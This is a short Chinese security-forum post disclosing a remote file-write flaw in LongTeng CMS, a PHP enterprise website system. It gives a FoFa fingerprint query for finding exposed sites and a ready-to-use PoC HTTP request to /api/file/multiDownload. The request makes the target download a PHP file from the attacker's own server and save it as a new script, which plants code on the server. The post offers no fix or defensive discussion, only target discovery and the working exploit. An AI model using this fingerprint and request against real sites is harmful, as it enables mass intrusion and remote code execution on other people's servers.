龙腾CMS存在远程文件写入漏洞-网络安全论坛-网络安全-阻击者联盟

龙腾CMS存在远程文件写入漏洞

 龙腾CMS自主研发PHP底层框架,永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。系统采用简单到想哭的模板标签,只要懂HTML就可快速开发企业网站。官方提供了大量网站模板免费下载和使用,将致力于为广大开发者和企业提供最佳的网站开发建设解决方案。

FoFa语句:

"/static/index/skin/default/img/LT.png"

4907c52295997d53740b37f2265538cb

 

Poc:

GET /api/file/multiDownload?file=http://你的服务器地址/1.php&savePath=2.php HTTP/1.1
Host: 
Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

5e5bd61b3b41ae410c5d9bd682d137b0

 

 

请登录后发表评论

    没有回复内容